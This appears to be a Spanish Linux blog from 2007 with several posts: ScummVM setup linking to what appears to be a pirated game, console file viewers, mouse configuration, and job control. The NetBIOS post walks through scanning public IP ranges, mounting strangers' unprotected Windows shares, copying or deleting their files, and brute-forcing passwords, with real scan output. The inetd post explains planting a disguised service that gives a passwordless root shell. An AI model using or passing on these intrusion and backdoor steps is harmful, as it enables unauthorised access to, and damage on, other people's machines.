11/30/2007


Jugando al Monkey Island en Gnu/Linux!

Monkey Island (en español, La Isla del Mono, aunque nunca se tradujo) es una saga de videojuegos de aventuras producida y publicada por LucasArts, originariamente conocida como LucasFilms Games. Los juegos narran la historia de cómo Guybrush Threepwood intenta convertirse en el pirata más temido del Caribe, enfrentándose al malvado pirata LeChuck y conquistando el corazón de la gobernadora de Mêlée Island, Elaine Marley.

Ron Gilbert, el creador de la serie, sólo trabajó en los dos primeros juegos antes de abandonar LucasArts. Los derechos de Monkey Island siguieron siendo propiedad de LucasArts, y el tercer y cuarto juegos fueron publicados sin la aportación de Gilbert, lo que a juicio de muchos fans de la saga concurrió negativamente en la misma.

Fuente:Monkey Island

Primeramente jugué al Monkey Island 3 por el año 2001, ya que un amigo me prestó sus cds =). Pero hace unos días volvió a mi mente ese juego y busqué en Internet si era posible jugarlo en linux ya sea emulandolo con wine u otras formas. Pero a sorpresa mía, me encontré con ScummVm, que no es nada menos que una máquina virtual con licencia GPL para ejecutar los juegos creados originalmente para el motor Scumm de LucasArt, y portado para múltiples plataformas...asi que podremos jugar a la saga del Monkey Island sin problema alguno :)

Si quieren bajar Monkey Island 3 The curse of Monkey Island debajo esta el link para descargarlo, dividido en 4 partes:(Recomiendo esta versión, ya que las anteriores tienen graficos antiguos, pero si quieren saber la historia completa van a tener que jugar todas las versiones :).


http://rapidshare.com/files/19789224/Monkey_Island_3__Espa_ol__SCUMMVM.part1.rar


http://rapidshare.com/files/20122228/Monkey_Island_3__Espa_ol__SCUMMVM.part2.rar


http://rapidshare.com/files/20136216/Monkey_Island_3__Espa_ol__SCUMMVM.part3.rar


http://rapidshare.com/files/20146713/Monkey_Island_3__Espa_ol__SCUMMVM.part4.rar

Una vez bajado los cuatro, abrimos el primer comprimido en mi caso con Filer Roller



Ponemos en extraer y descomprimirá todos los comprimidos en un directorio.
Luego tendremos que Instalar Scummvm:

debian:/# apt-get install scummvm

Y lo ejecutamos en la consola: scummvm & o en el menu de programas que tengas

Nos aparecera el Menú principal de ScummVm. Luego clickeamos 'Add game' y seleccionamos la carpeta del Monkey Island 3 descomprimido, después en 'Chose'.


Ponemos en 'Start' y Ya estaremos Jugando :). Si queremos pantalla completa tildamos 'full screen' en 'Options' del menú principal.





Si se les hace complicado el juego en modo difícil,aquí tienen una guía jaaj

Espero que les halla gustado chau :).

11/28/2007


Montando directorios compartidos en Internet por (culpa) Netbios en Gnu/Linux =)

Montando directorios compartidos en Internet por (culpa) Netbios en Gnu/Linux =)

Utilidad de Netbios según Wikipedia.

Resumiendo, de forma sencilla, NetBIOS, permite a las aplicaciones 'hablar' con la red. Su intención es conseguir aislar los programas de aplicación de cualquier tipo de dependencia del hardware. También evita que los desarrolladores de software tengan que desarrollar rutinas de recuperación ante errores o de enrutamiento o direccionamiento de mensajes a bajo nivel. Coloquialmente hablando, NetBIOS hace el 'trabajo sucio'.
..................................................................................................................

Hace mucho tiempo había observado la cantidad de maquinas que se conectaban a internet con Netbios habilitado, la verdad me sorprendió demasiado, pero actualmente las cosas no cambiaron mucho.
Aquella vez había escaneado con una herramienta en Window$, si... no conocía Gnu/Linux todavía =P. Y bueno hoy le voy a demostrar que se puede conseguir los mismos resultados...

------------------------------------------------------------------------------------------------------------

Para comenzar necesitamos tener instalado smbclient y smbfs, si estan en debian le dan

apt-get install smbclient smbfs

Primero escaneamos maquinas que tengan netbios activado con el programa nbtscan.

zh3ta@debian:~$ nbtscan 201.255.0.0/16
Doing NBT name scan for addresses from 201.255.0.0/16

IP address NetBIOS Name Server User MAC address
------------------------------------------------------------------------------
201.255.36.237 44:45:53:54:00:00
201.255.68.11 PC_WIN98 PC_WIN98 44:45:53:54:00:00
201.255.68.32 CONSULTORIO 00:0d:87:51:73:24
201.255.77.182 SILVIA SILVIA 44:45:53:54:00:00
201.255.77.249 A1 A 44:45:53:54:00:00
201.255.78.89 DESKTOP 00:53:45:00:00:00
201.255.91.84 URRUTTIA URRUTTIA 44:45:53:54:00:00
201.255.97.221 44:45:53:54:00:00
201.255.136.251 WIN98SE WIN98SE 44:45:53:54:00:00
201.255.146.41 DESKTOP 00:53:45:00:00:00
201.255.160.235 VD-A51EF1B760FA 00:53:45:00:00:00
201.255.161.28 VICTORIA-CASA 00:1a:92:cc:b4:dc
201.255.236.217 OSCAR OSCAR 00:0b:6a:d9:d2:f5
201.255.254.224 44:45:53:54:00:00
201.255.255.43 OEMCOMPUTER OEMCOMPUTER 44:45:53:54:00:00

Si quieren mas informacion le agregan el parametro -v.

zh3ta@debian:~$ nbtscan -v 201.255.0.0/16
Doing NBT name scan for addresses from 201.255.0.0/16


NetBIOS Name Table for Host 201.255.64.96:

Name Service Type
----------------------------------------
LUNAROMA <00> UNIQUE
WORKGROUP <00> GROUP
LUNAROMA <03> UNIQUE

Adapter address: 44:45:53:54:00:00
----------------------------------------


NetBIOS Name Table for Host 201.255.144.107:

Name Service Type
----------------------------------------
X5Y5N8 <00> UNIQUE
WORKGROUP <00> GROUP
X5Y5N8 <03> UNIQUE

Adapter address: 44:45:53:54:00:00

Luego elegimos una ip y utilizamos smbclient para comprobar si comparte recursos. El parámetro -L le indica que liste los mismos y el -N que no pida contraseña.

debian:/home/zh3ta# smbclient -L 201.250.49.249 -N
Domain=[DESKTOP] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

Sharename Type Comment
--------- ---- -------
Impresora Printer Macromedia FlashPaper
hpdeskje.2 Printer hp deskjet 3500 series (Copiar 1)
IPC$ IPC IPC remota
print$ Disk Controladores de impresora
C Disk
Documentos c Disk
F Disk
Administrador Disk
session request to 201.250.49.249 failed (Called name not present)
session request to 201 failed (Called name not present)
Domain=[DESKTOP] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

Server Comment
--------- -------

Workgroup Master
--------- -------
debian:/home/zh3ta#

Si nos sale eso y les sale algo como acontinuacion quiere decir que no tiene todos los puertos habitados o nose que =P, van a tener que seguir buscando.

debian:/home/zh3ta# smbclient -L 201.250.102.224 -N
session request to 201.250.102.224 failed (Called name not present)
session request to 201 failed (Called name not present)
session request to *SMBSERVER failed (Called name not present)


Si la ip tiene recuersos para compartir entonces pueden montarlos =).

debian:/home# mount -t smbfs //$1/$2 /media/samba/

Donde $1 es la ip y $2 es el directorio montar. Ejemplo:

debian:/home/zh3ta# mount -t smbfs // 201.250.49.249/$IPC /media/samba/

Si nos salta esto:

debian:/home/zh3ta# mount -t smbfs //201.250.49.249/$IPC /media/samba/
Password:
14247: tree connect failed: ERRDOS - ERRnosuchshare (You specified an invalid share name)
SMB connection failed

Quiere decir que necesitamos el password...por lo tanto seguiremos buscando en otro directorio o con un ataque de fuerza bruta...como quieran.
En cambio si no le salta el mensaje de error, habrá montado el directorio sin problemas =).

debian:/home/zh3ta# mount -t smbfs //201.250.49.249/F /media/samba/
Password:
debian:/home/zh3ta#

Despues nos movemos en el directorio como cualquier otro.

debian:/home/zh3ta# cd /media/samba/
debian:/media/samba# ls
AITEMP CONFIG.SYS Mp3 RECYCLER
AUTOEXEC.BAT IO.SYS MSDOS.SYS System Volume Information
debian:/media/sabado#

Y bueno ahi dentro podemos subir o bajar cosas como cualquier directorio, cp, mv, rm etc.

Para simplificar las cosas cree unos scripts burdos en bash que pueden ser mejorados obviamente jeje.

Ver recursos compartidos:

#!/bin/bash
smbclient -L "$1" -N

despues le damos permisos de ejecucion chmod +x versmb y lo ejecutamos.

debian:/home/zh3ta# ./versmb 201.250.49.249
Domain=[DESKTOP] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

Sharename Type Comment
--------- ---- -------
Impresora Printer Macromedia FlashPaper
hpdeskje.2 Printer hp deskjet 3500 series (Copiar 1)
IPC$ IPC IPC remota
print$ Disk Controladores de impresora
C Disk
Documentos c Disk
F Disk
Administrador Disk

Montar Directorios:

#!/bin/bash
mount -t smbfs //$1/$2 /media/samba/

y lo ejecutamos asi, primero la ip y despues el directorio a montar:

debian:/home/zh3ta# ./montarsmb 201.250.49.249 C

Por ultimo hay un programita que se llama smb-nat(Netbios Auditing Tool) que es tipo un brute force. Para utilizarlo lo instalamos:

debian:/home/zh3ta# apt-get install smb-nat

Y lo ejecutamos:

debian:/home/zh3ta# smb-nat -u /usr/share/smb-nat/userlist.txt -p /usr/share/smb-nat/passlist.txt 201.250.49.249

debian:/home/zh3ta# ./auditarsmb 201.250.49.249
[*]--- Reading usernames from /usr/share/smb-nat/userlist.txt
[*]--- Reading passwords from /usr/share/smb-nat/passlist.txt

[*]--- Checking host: 201.250.49.249
[*]--- Obtaining list of remote NetBIOS names
[*]--- Remote systems name tables:

DESKTOP
WORKGROUP
DESKTOP
WORKGROUP
WORKGROUP
__MSBROWSE__

[*]--- Attempting to connect with name: *
[*]--- Unable to connect

[*]--- Attempting to connect with name: DESKTOP
[*]--- CONNECTED with name: DESKTOP
[*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
[*]--- Server time is Wed Nov 28 23:09:12 2007
[*]--- Timezone is UTC-3.0
[*]--- Remote server wants us to encrypt, telling it not to
[*]--- Attempting to establish session

[*]--- Attempting to access share: \\DESKTOP\
[*]--- Unable to access


/usr/share/smb-nat/userlist.txt : es donde se encuentra las combinaciones posibles para el nombre de usuario, obviamente podremos agregarle lo que queramos, este path es solo para debian.

/usr/share/smb-nat/passlist.txt: idem del anterior, solo para las contraseñas.

$IP: es la ip que queremos auditar.

Recomendación:

El nbtscan es algo imperfecto porque verifica si el puerto 139 se encuentra abierto, pero eso no quiere decir que esa maquina comparta los recuersos. Si quieren altas probabilidades de obtener exito, necesitaran escanear con el nmap con el parametro -p 137-139, de esta manera encontrarán maquinas "mas" vulnerables.

Listado de Puertos Netbios:

netbios-ns 137/tcp NETBIOS Name Service
netbios-ns 137/udp NETBIOS Name Service
netbios-dgm 138/tcp NETBIOS Datagram Service
netbios-dgm 138/udp NETBIOS Datagram Service
netbios-ssn 139/tcp NETBIOS Session Service
netbios-ssn 139/udp NETBIOS Session Service


No me hago responsable por el uso que le puedan dar al documento, este fué escrito con motivos didácticos.

Bueno espero que les halla gustado, chau.!

11/22/2007


Ver archivos .doc y .pdf desde la consola de un modo elegante!

Bueno si queremos ver archivos .doc y .pdf desde nuestra consola existen varias herramientas pero los datos no se presentan de una forma adecuada en pantalla. Por eso en este libro se explica de una manera sencilla y elegante de como verlos.

Visualizar ficheros .doc:

Instalamos wv(Programa para acceder a ficheros de Micro$oft Word) y el navegador w3m.

apt-get install wv w3m


Luego si queremos verlo solo tipeamos esto:

wvWare -x /usr/share/wv/wvHtml.xml documento.doc | w3m -T text/html


//El fichero wvHtml.xml puede estar en otro lugar, depende de la distro. Para debian etch es este.

Pero si queremos algo mas facil de utilizar y bonito podemos crear un script en bash.

touch verdoc
chmod +x verdoc
mv verdoc /usr/bin/
vi /usr/bin/verdoc


y le agregamos este scrip. Acuerdense que para ingresar datos en vim tienen que presionar la tecla i, y para guardarlo la tecla esc y despues :wq!, aclaro por si algun novato no sabe.

#!/bin/bash
if [ $# -eq 1 ]; then
if [ -e "$1" ]; then
wvWare -x /usr/share/wv/wvHtml.xml "$1" 2>/dev/null | w3m -T text/html
else
echo No es un Archivo Valido
fi
else
echo Ingrese un archivo para verlo
fi

Despues para ver un documento tipeamos:

verdoc documento.doc
y listo =).

Visualizar ficheros .pdf:

Para visualizar un archivo pdf tendremos que tener instalado elinks(Navegador modo consola y pdftohtml(Convierte archivos pdf en html).

apt-get install elinks pdftohtml


Luego para visualizarlo, tenemos dos maneras, la primera sin frames(es decir sin el frame izquierdo que da la posiblidad de elegir las páginas), y la segunda con frames(recomendada).

pdftohtml -q -noframes -stdout documento.pdf | elinks
pdftohtml -q documento.pdf ; elinks documento.html


Pero de esta manera es medio engorroso acordarse, por eso vamos a diseñar un script =).

touch verpdf
chmod +x verpdf
mv verpdf /usr/bin
vi /usr/bin/verpdf


Y le agregamos esto:

#!/bin/bash
if [ $# -eq 1 ]; then
if [ -e "$1" ]; then
pdftohtml -q "$1" $HOME/temp.html
elinks $HOME/temp.html
else
echo No es un Archivo Valido
fi
else
echo Ingrese un archivo para verlo
fi

Ahora si queremos ver un documento pdf solo tenemos que tipear:

verpdf documento.pdf.

Les dejo un screenshot. Espero que les halla gustado chau :)


Configurar el mouse en las Terminales tty(Consolas)

Bueno luego de 1 hora pude configurar mi mouse serial para utilizarlo en las terminales y en el modo grafico =). Para que sirve? Bueno para poder copiar y pegar texto entre las mismas, ademas de dar soporte para algunos programas como ej: el navegador para la consola elinks.
Primero tenemos que intalar gpm, el servidor de ratón de propósito general (del inglés, General Purpose Mouse server).

Configurar Gpm en Debian:

#apt-get install gpm

Despues vamos a configurar el archivo /etc/gpm.conf. Tienen que copiar la configuración según su mouse, puede ser serial o ps/2.

Mouse Serial:

device=/dev/ttyS0                                    
responsiveness=15
repeat_type=raw
type=ms3
append=''
sample_rate=


Mouse PS/2:

device=/dev/psaux
type=imps2
repeat_type=raw


Luego modificamos el archivo /etc/X11/xorg.conf para funcione también en las X. Dependiendo del mouse que usted tuviese, tendrá que copiar la configuración.

Mouse Serial


Section "InputDevice"
Identifier "Configured Mouse"
Driver "mouse"
Option "CorePointer"
Option "Device" "/dev/gpmdata"
Option "Protocol" "intellimouse"
Option "Emulate3Buttons" "true"
EndSection


Mouse PS/2:

Section "InputDevice"
Identifier "Configured Mouse"
Driver "mouse"
Option "Protocol" "IMPS/2"
Option "Device" "/dev/gpmdata"
Option "ZAxisMapping" "4 5"
EndSection


Y en la seccion "ServerLayout" que utilicemos :

InputDevice "Configured Mouse" "CorePointer"

------------------------------------

Bueno solo nos queda iniciar el servidor gpm.

#/etc/init.d/gpm start

Y si vemos el mouse en la pantalla moviéndose funciona =).
Luego podemos iniciar el servidor X y vemos que también funciona.

$startx

Actualización 01/03/08:

Configurar Gpm en Arch Linux:

Habilitando el soporte del mouse en la consola (gpm)

  • Puedes habilitar el soporte para el mouse en la consola instalando gpm:
pacman -S gpm
  • Si ves que el cursor del mouse tiempo y no funciona correctamente, necesitarás cambiar /etc/conf.d/gpm.

Para los mouse PS/2 reemplaza la siguiente línea con:

GPM_ARGS="-m /dev/psaux -t ps2"

Para los mouse USB reemplaza la siguiente línea con:

GPM_ARGS="-m /dev/input/mice -t imps2"

Para los mouse SERIAL reemplaza la siguiente línea con:
GPM_ARGS="-m /dev/ttyS0 -t ms3"

  • Cuando funcione puedes añadir gpm a DAEMONS en /etc/rc.conf para que inicie en el booteo.
Espero que les halla gustado y/o servido. Saludos!

Referencias:
wiki.archlinux.org
bulma.net

11/16/2007


Inetd y Xinetd

Muy buen articulo que habla del uso de inetd y xinetd y como podemos crear un troyano con esos demonios. Fuente e-zine datacode N.4


INETD Y XINETD
--------------
Estos Superdemonios sirven para controlar las conexiones de red en un ordenador.
En inetd cuando se detecta un intento de conexion al pc, este se redirije a un programa
conocido como tcpd.
*tcpd ---> Demonio que puede monitorizar y filtrar peticiones entrantes para diversos
*servicios tales como finger , ftp, ssh y muchos algunos más. Tcpd anota los intentos en un log.
Tcpd , dependiendo de las reglas contenidas en el host.allow y el host.deny, (ambos archivos se encuentran en /etc/ ),
** La estructura de una linea de estos ficheros es la siguiente:
ALL: LOCAL: ALLOW | 1ş ---> Demonio , en este caso se refiere a todos.
--- ---- ------- | 2ş ---> Host, aparte de la ip se pueden
1 2 3 | poner las siguientes opciones. | ALL ---> Todas las conexiones.
| LOCAL -> Conexiones que no contienen un punto.
| PARANOID > Máquinas que no coincide el nombre con la ip.
| KNOWN ---> Conexiones de las cuales se conoce el nombre y la ip.
| UNKNOWN -> Conexiones de las cuales se desconoce el nombre o la ip.

| 3ş ---> Posibles opciones . |ALLOW ---> Acepta.
|DENY ----> Deniega.
|TWIST ---> Ejecuta un comando, pero no establece
|la conexion.
|SPAWN ---> Una vez establecida la conexion,
|esta opcion ejecuta un comando en la shell
| ** Para TWIST y SPAWN , podemos poner unos parametros que nos ayuden
| a completar los comandos que pongamos para qu se ejecuten en la shell.Serian:
| %a ---> Nos pondria el nombre de la máquina que intenta acceder a nuestro pc
| %d ---> El demonio que esta utilizando.
| %p ---> El PID del proceso que esta usando.

acepta o deniega la conexion. Si la peticion se acepta se iniciara el servicio
correspondiente. Este mecanismo se denomina tcp_wrapper.

EJEMPLOS
--------
En el /etc/host.deny :

ALL: ALL |---> Deniega todas las conexiones a todos los servicios.

ALL: ALL except 195.125.24.1 |----> Este ejemplo realiza la misma funcion del anterior,
| unicamente que aceptara solamente las conexiones a todos
| los servicios de 194.125.24.1.

proftpd: ALL |---> Deniega todas las conexiones al servicio ftp.


ALL: ALL TWIST |---> No deja establecer la conexion a nadie , pero poniendo TWIST, podemos
| ejecutar un comando.

ALL: ALL TWIST (/bin/echo -e " Intento de conexion de %n a traves del demonio %a " >> /var/log/conexiones &)
------------------------------------------------------------------------------------------------------------
|-> Este Comando nos rechaza todas las conexiones, pero crea un log
| en /var/log/conexiones con todos los intentos de conexion, mostrandonos
| una linea en la que nos muestra la ip y el demonio que utiliza.

En el /etc/host.allow:

ALL: ALL |---> Acepta todas las conexiones.

ALL: ALL except 195.125.24.1 |-> Acepta todas las conexiones salvo la de 194.125.24.1.

telnetd: ALL SPAWN (/bin/echo -e " Ha entrado al telnet %a " >> /var/log/conexiones &)
--------------------------------------------------------------------------------------
|-> Este comando Acepta todas las conexiones a traves de telnet y las logea
| en /var/log/conexiones dandonos la ip.

sshd: 195.125.15.4 , 182.47.14.89 |----> Acepta las conexiones por ssh de 195.125.15.4 y
| 182.47.14.89 .


Buen ahora voy a tratar un poco la configuracion de inetd.
Para ello tendriamos que modificar el archivo inetd.conf que se encuentra en nuestro
directorio /etc.

Bueno , para cerrar un servicio en el inetd, unicamente tienes que comenlar la linea del servicio,
como en este caso:
# echo stream tcp nowait root internal
Una vez comentada la linea se debe de reiniciar el demonio , nada de reiniciar el pc ,
lo digo para aquellos que viven con la mentalidad anclada en windows :). Para reinciar el
demonio lo unico que teneis que hacer es /etc/init.d/inetd restart:
tecnet:/etc# /etc/init.d/inetd restart
Restarting internet superserver: inetd.
tecnet:/etc#
Ahora voy a comentar un poco la estructura de una frase del inetd.conf
time stream tcp nowait root internal
---- ------ --- ------ ---- --------
1 2 3 4 5 6

1ş ----> Nombre del servicio.Se buscará en /etc/services , para ver a que puerto corresponde.
Ex de una linea del /etc/services:
ftp 21/tcp | La primera parte nos indica el nombre del servicio, después
| nos dice el puerto que usará y el protocolo.
| En este ejemplo se habla del servicio ftp , que corresponden
| al puerto 21 de la maquina y va por el protocolo tcp.

2ş ----> Tipo de socket --> Pueden ser de estos tipos en este fichero de configuracion(con esto
quiero decir que hay más aparte de estos, pero no tienen que ver con el inet.conf).
Sockets Stream ---> Son los más usados , hacen uso del protocolo tcp.
Sockets Dgram (datagram) --> Hacen uso del protocolo UDP.
Sockets Raw --> Son los menos comunes, se suelen usar para desarrolar nuevos protocolos de comunicacion
Sockets rdm
Sockets seqpacket

3ş ---> El protocolo, puede ser uno de los que hay en /etc/protocols.
4ş wait/nowait ---> Esta parte será siempre nowait , salvo cuando el tipo de socket
es dgram, que puede tener wait si es mono hebra o nowait si es multi hebra.
5ş El usuario --> El nombre del usuario por el cual correra el proceso.
6ş Server path y argumentos ---> Aqui se indica la direccion del demonio (Internal quiere
decir que el servicio se encuentra dentro del mismo inetd).

El inetd , cuando linux está recien instalado deja algunos servicios abiertos , que no nos
sirven para nada , solo para aportar informacion a posibles atacantes por ello es conveniente
que los cerremos. Para ello nos vamos al /etc/inetd.conf y comentamos servicios como :

#:INTERNAL: Internal services
#echo stream tcp nowait root internal
#echo dgram udp wait root internal
#chargen stream tcp nowait root internal
#chargen dgram udp wait root internal
#discard stream tcp nowait root internal
#discard dgram udp wait root internal
#daytime stream tcp nowait root internal
#daytime dgram udp wait root internal
#time stream tcp nowait root internal
#time dgram udp wait root internal
no nos sirve ninguno , por eso los tengo comentados y los de talk y ntalk , pues si lo vais a
usar lo dejais si no lo comentais tb.


Bueno , después de saber esto , la gente más "avispada" se habrá dado cuenta de que
se podría hacer una especie de "troyano" (digo la gente más avispada, ya que la gente
con más conocimientos no se habrá dado cuenta , lo sabrá ;) ) usando el /etc/services
y el /etc/inetd.conf .
Claro , si nosotros declararamos un servicio en /etc/services , y después, usamos en el
inetd.conf ese servicio y en el lugar de especificarle el demonio le espeficamos una
ruta a una shell , podremos acceder a esa shell , sin necesidad de ningún password.
Voy a explicar los pasos con ejemplos:
Nosotros tenemos una linea en el /etc/services :
ftp 21/tcp

Solo tendriamos que imitarla poniendo algún puerto que no se use , por ejemplo el 8 (Se
podría poner cualquiera que no estuviera en el services), y ademas le tenemos que dar
un nombre al servicio , no es recomendable que se le den nombres que tengan algo que ver
con el usu que le vamos a dar o puedan dar alguna pista , por ejmplo puerto_backdor o troyano xD,
tendriamos que darle un nombre, que algun novato se lo pueda tomar como un servicio mas y les
parezca algo serio como por ejmplo userd o algo como tsystem jeje , nos vamos a quedar con
tsystem, dejariamos una linea similar a esta:

tsystem 8/tcp

Después tendriamos que ir a por el inetd.conf y darle forma a una regla que nos pueda
servir para que nos cree una shell cada vez que hagamos telnet a ese puerto, sería algo
parecido a esto:

tsystem stream/tcp nowait root /bin/bash

Esto da el servicio y al hacer telnet ip 8 , nos daría acceso a una shell como root sin
necesidad de password. (Claro está que cuando hacemos una modificacion en el inetd.conf
debemos reinciar inetd para que podamos usar los cambios).
Claro que para poner estos cambios necesitas ser root y no conozco a nadie que pueda
ser tan &%$** como para hacer eso.

Ahora voy a hablar de xinetd.
------------------------------

Xinetd tiene unas funciones bastante parecidas a las de inetd y tcpd , pero se pueden
hacer muchas mas cosas, y tiene una estructura que puede resultar más "amgigable", por
lo menos para mi jeje.

El fichero de configuracion de xinetd se encuentra en /etc/xinetd.conf , y para cada
servicio existe una sección pudiendo definir en cada seccion bastantes opciones
sobre el servicio. La primera seccion de xinetd es defaults, las opciones que pongamos
en esta seccion se definen las opciones por defecto que tendran el resto de las secciones.
estructura:
defaults
{
atributos
}

Una seccion de xinetd dedicada a un servicio tiene la siguiente estrructura :

service nombre_del_servicio
{
atributos
}

Se ponen mas o menos los mismo datos , voy a seguir el mismo orden que seguiria una
linea del inetd.conf:

service ftp ## Nombre del servicio , que debe estar en /etc/services.
{
socket_type = stream ## Tipo de socket , de momento tiene una estructura muy parecida a la del inetd.conf
wait = no
server = /usr/sbin/proftpd ## El lugar donde está el daemon.
}
## Hasta aquí ha sido todo bastante parecido a la config del inetd, pero en el xinetd nosotros podemos definir opciones que para definirlas en el
## inetd , necesitariamos hacer uso del /etc/hosts.allow y /etc/host.deny. Vamos a ver algunas de ellas.
* only_from Pueden ser ips , nombre de hosts etc , es una lista con los clientes que pueden acceder al servicio.
* no_acces Los clientes que no pueden acceder al servicio.
* protocol El protocolo , que debe de estar en /etc/protocols , como en inetd.
* port El puerto que usa el servicio.
Tambien se puede especificar unas horas determinadas para ver cuando el servicio
esta activo con el comando access_times.
* instances Nos indica la cantidad de clientes del mismo tipo que pueden conectarse a la vez por ese servicio.
Y otras muchas funciones que se podrían añadir.
Vamos a poner un ejemplo :
Supongamos que queremos tener nuestro servidor ftp (usando protfpd) abierto solo por la tarde , concretamente
de 5 de la tarde a 9 de la noche(17:00-21:00) no queremos que entren a la vez mas de 5 usuarios,
y tegan solo acceso los clientes con un rango de ips entre 182.52.13.0/32 salvo el
cliente con la ip 182.52.13.9 que nos cae mal. Para representar el servicio nos quedaría una cosa así:
service ftp
{
socket_type = stream
port = 21
protocol = tcp
user = root
server = /usr/sbin/proftpd
access_times = 17:00-21:00
instances = 5
only_from = 182.52.13.0/32
no_acces = 182.52.13.9
}
Se empieza definiendo el tpo de socket, el puerto que usa el servicio y el protocolo , y despues
empiezo a poner los datos del demonio y como quiero que esté configurado.

Bueno , ya he explicado +/- el uso de inetd y xinetd.


Programas Gnu/Linux para la consola!

Proveniente de Unix, linux es creado con el fin de controlarlo en modo consola, no como otros sistemas creados a partir del modo grafico y por ende puede ser usado totalmente en pantallita negra =). Me base en estos articulo[1],articulo[2] para hacer este post y le agregue algunos porgramitas mas jeje. Y no digan que no tienen recursos para disfrutar los beneficios de nuestra poderosa shell =P.

- Navegadores Web: Elinks, Lynx, W3m.

- EMail: Gmail funciona en Elinks, pero para clientes en local, mutt, o pine.

- Mensajería instantánea :
Finch(Version consola de Pidgin), mcabber (proviene de jabber), o Freetalk (de GTalk). Y también Centeriq, Centerim, Bitlbee y IRSSI.

- RSS(Lector de noticias): raggle y newsbeuter.

- Explorador de archivos o Administrador de archivos: mc(Midnight Commander).

- Diseño: cadubi (permite hacer dibujos ascii =))

- Visor de imágenes: ZGV, que funciona a través del framebuffer.

- Reproductor de vídeo: Mplayer y VLC son capaces de dar salida al vídeo por framebuffer. Y si no, ‘mplayer -vo aa nombrevideo.xxx” para verlo en formato ASCII -)

- Editor de textos: vi, vim, emacs,joe, nano,etc.

- Control de Sonido: alsamixer, aumix

- Reproductor de música: Cplay, moc, orpheus, mpd, mp3blaster,cmus(reproduce wma).

- P2P: Rtorrent, azureus.

- Gestor de ventanas: twin, y screen.

- Grabación de CDs/DVDs: bashburn,cdw, burn,cdrskin.

- Descarga HTTP:
Wget.

- Descarga FTP: lftp.

- Grabar cd: cdrecord

- Copiar cd: dd

- Copiar dvd: dvdbackup growisofs

- Ver .doc (el Word): catdoc antiword

- Ver .xls (Excel): xlsview antixls

- Convertir pdf a texto: pdftotext

- Convertir pdf a html: pdftohtml

- Encriptar archivos: gpg

- Encriptar directorios/particiones: encfs

- Firewall: iptables shorewall firehol

- Sniffer: iptraf, tcpdump, p0f

Para instalar alguno de estos programas en debian solo tienen que poner apt-get install NOMBREDELPROGRAMA y sino apt-cache search NOMBREDELPROGRAMA para devolver el nombre del instalador. Saludos!

11/15/2007


Modificar el mensaje de bienvenida o banner al iniciar!

Bueno para modificar el mensaje de bienvenida predeterminado cuando iniciamos el equipo en modo consola para despues tipear startx e iniciar el modo grafico, tenemos que modifica el fichero /etc/motd con su editor favorito...primero podemos hacer una copia del actual que en mi distro generalmente dice:


The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

debian:/# cp /etc/motd /etc/motd.viejo
debian:/# mousepad /etc/motd

Luego podemos editarlo a gusto, en mi caso le agregue una ascii-art, si quieren hacer el suyo pueden entrar en Ascii
Y quedo asi...



Tenemos que copiarlo a otro fichero por motivos de configuracion:
debian:/# cp /etc/motd /etc/motd.tail
Entonces cada vez que me registro al arrancar la compu, aparece mi mensaje modificado =).
En este archivo /etc/init.d/bootmisc.sh se encuentra configuraciones para el arranque. Saludos!


Control de procesos, en primer y segundo plano!

Bueno quizas estamos en la consola y necesitamos abrir otra aplicacion pero no queremos quitar la que tenemos en pantalla, por ejemplo estamos editando un archivo de texto en vim y queremos correr mp3blaster(reproductor de musica), primero tenemos que suspender la tarea, es decir que en este estado no consume recursos del cpu y espera a ser continuada. Presionamos ctrl+z y les aparecera un mensaje similar a
este..

debian:/# vi /etc/inetd.conf

[1]+ Stopped vi /etc/inetd.conf
debian:/#


Luego ejecutamos mp3blaster y elegimos el tema....



Presionamos ctrl+z nuevamente y la suspendemos...nos aparecera siguiente mensaje..

debian:/# mp3blaster

[2]+ Stopped mp3blaster


Nos quiere decir que tenemos 2 tareas suspendidas, podemos verlas con el comando ps -ax y grep busca las lineas que tengan la letra T en la columna STAT, esta indica que el proceso esta suspendido,podemos ver los valores mas significativos de esta columna:

Letra .........Significado


R .............. Corriendo
T .............. Suspendido
P .............. Esperando para Paginar
D .............. En espera Ocupada no interrumpible
S ............... Durmiendo menos de 20 seg
I ............... Durmiendo más de 20 seg
Z ............... Zombie


debian:/# ps ax | grep T
PID TTY STAT TIME COMMAND
8877 pts/2 Tl 0:00 vi /etc/inetd.conf
8904 pts/2 Tl 0:00 mp3blaster
8921 pts/2 R+ 0:00 grep T
debian:/#


Para controlar las tareas en segundo plano tenemos el comando jobs:

debian:/# jobs -l
[1]- 8877 Parado vi /etc/inetd.conf
[2]+ 8904 Parado mp3blaster
debian:/#


Si queremos pasar alguna tarea a primer plano tenemos el comando fg, aclaremos que el mismo controla la ultima tarea, si queremos pasar a primer plano el programa vim le damos como parametro el numero [1] indicado en la primera columna del comando jobs.

debian:/# fg 1



Para pasar una tarea a segundo plano tenemos el comando bg(background):

debian:/# bg 1
[1]+ vi /etc/inetd.conf &
debian:/# jobs -l
[1]+ 8877 Parado (requiere salida por terminal) vi /etc/inetd.conf
[2]- 9754 Parado mp3blaster
debian:/#


Este comando es lo mismo si hicieramos:

debian:/# vim /etc/inetd.conf &

ya que continua la tarea en segundo plano.

Hay que aclarar que en estado suspendido no se puede matar a la tarea, muere despues de pasarla a primer o a segundo plano.
Ej:

debian:/# jobs -l
[1]+ 8877 Parado (requiere salida por terminal) vi /etc/inetd.conf
[2]- 9754 Parado mp3blaster
debian:/# kill 8877
debian:/# ps ax | grep T
PID TTY STAT TIME COMMAND
8877 pts/2 Tl 0:00 vi /etc/inetd.conf
9754 pts/2 Tl 0:00 mp3blaster
10266 pts/2 R+ 0:00 grep T
debian:/#


Aca vemos que vim se sigue ejecutando despues de haberla matado, pero si la pasamos a segundo o a primer plano muere...

debian:/# fg 1
vi /etc/inetd.conf
Vim: capté una señal de muerte TERM
Vim: finalizado.
Terminado
debian:/#


De esta manera podemos ver que el archivo continua en memoria despues de haberlo eliminado y por ende puede ser recuperado....les mostrare luego como se hace =). Espero que les halla servido y/o gustado. Saludos!

11/08/2007


Instalar Openbox en Debian Etch!

